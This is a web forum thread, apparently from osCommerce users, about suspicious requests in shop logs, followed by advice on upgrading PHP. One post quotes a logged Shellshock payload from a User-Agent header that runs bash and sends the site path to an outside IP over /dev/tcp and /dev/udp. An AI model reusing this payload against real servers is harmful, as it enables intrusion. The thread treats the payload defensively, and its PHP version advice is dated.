What is this person doing?

[drillsar]

I installed http error log and noticed a couple of people keep going to find this file:

 

/images/thumbnails/160/160/product/1/yhst-129599579720997_2272_101803540.jpg

 

and it doesnt exist? They trying to hack or what?

[clustersolutions]

Look at the IP and see where the request is coming from. You could have issues in your codes, or there can be bad links that you cannot control. There aren't much to hack with that link...

[rory1]

I have installed supertracker  and i  find this...

Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"

Referred By: /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?" target="_blank">() { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?

 

where mysitexxxx = my site

 

with 3 different ways  maybe try of hacking?

[greasemonkey]

It may be just a bot trying to index your images.

[♥kymation]

@@rory1  That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran".

 

My bet is that it's a hack attempt, or trying to get information for one.

 

Regards

Jim

[drillsar]

I would ban that IP definitely looks suspicious even know it may do no good

[rory1]

@@kymation They succeeded to send spam mail from my site...i made restore from previews days and i ban the ip..now i must find how they doit...

[♥kymation]

If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that?

 

You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher.

 

Regards

Jim

[rory1]

@@kymation my version is 5.3 i have to contact to my webhost to update it

[♥kymation]

PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version.

 

Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5.

 

Regards

Jim

[Blue Penguin]

@@kymation - good to know about the php 5.5.  I have noticed there seems to be an ability to select options json, soap, pdf.  Would anyone know of a useful link for what should be turned on?  Or even one that talks about security in php 5.5.

 

-BP

[♥kymation]

Json is used by some modules (USPS for one) so I would turn that on. Soap is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc.

 

PHP 5.5 is still being actively maintained, so I think it is pretty safe.

 

Regards

Jim

[Blue Penguin]

Thank you kymation,
 
   I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc.

 

As I am looking at around 100+ of such things.  I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just a admin interface now for turning on and off items?

 

This ability wasn't present with the older versions on my host so it go me to wondering if 5.5 has a special focus to ensure better security.

It also got me curious what would be relevant for security or functionality for osCommerce.  I know that php has a config file to turn things on and off but haven't gotten to open that up and analyze it yet.  Which may or may not be possible as the Host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose.

 

-BP